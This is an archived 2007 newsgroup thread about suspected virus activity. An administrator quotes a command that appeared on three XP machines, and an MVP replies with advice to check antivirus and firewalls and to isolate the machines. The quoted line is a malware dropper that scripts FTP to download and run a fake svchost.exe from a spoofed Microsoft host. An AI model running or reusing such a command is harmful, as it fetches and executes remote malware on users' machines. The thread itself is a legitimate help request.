Re: Virus Activity?
- From: "Lanwench [MVP - Exchange]" <lanwench@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
- Date: Thu, 19 Jul 2007 10:29:24 -0400
ctowndu33 <ctowndu33@xxxxxxxxxxxxxxxxxxxxxxxxx> wrote:
We had three users (all with XP SP2) that all of a sudden this
morning had their task manager open up along with a command prompt.
In the command prompt, a statement was input along the lines of the
following....
cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password
/Q o &svchost.exeo &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F
Anyone seen anything like this before? We haven't approved any
Windows Updates or anything like that (even though I wouldn't think
that would have anything to do with this). That is not a typo (above
in the statement where it says mircosoft password). Any help would
be appreciated. We saw three at the exact same time and then haven't
seen anymore (we have about 100 Windows XP SP2 machines).
Thanks in advance,
ctowndu33
What antivirus software do you use? What firewall protects your network? Is
the Windows firewall enabled on these machines? I would disconnect them from
the network immediately while you do some checking, although if your other
machines aren't sufficiently protected you may have other creepy crawlies on
the network.
.
- Prev by Date: Re: Correct location of Application data folder
- Next by Date: Re: How to remove trojans on USB memory disk?
- Previous by thread: Re: backup log
- Next by thread: Re: Virus Activity?
- Index(es):
Relevant Pages
|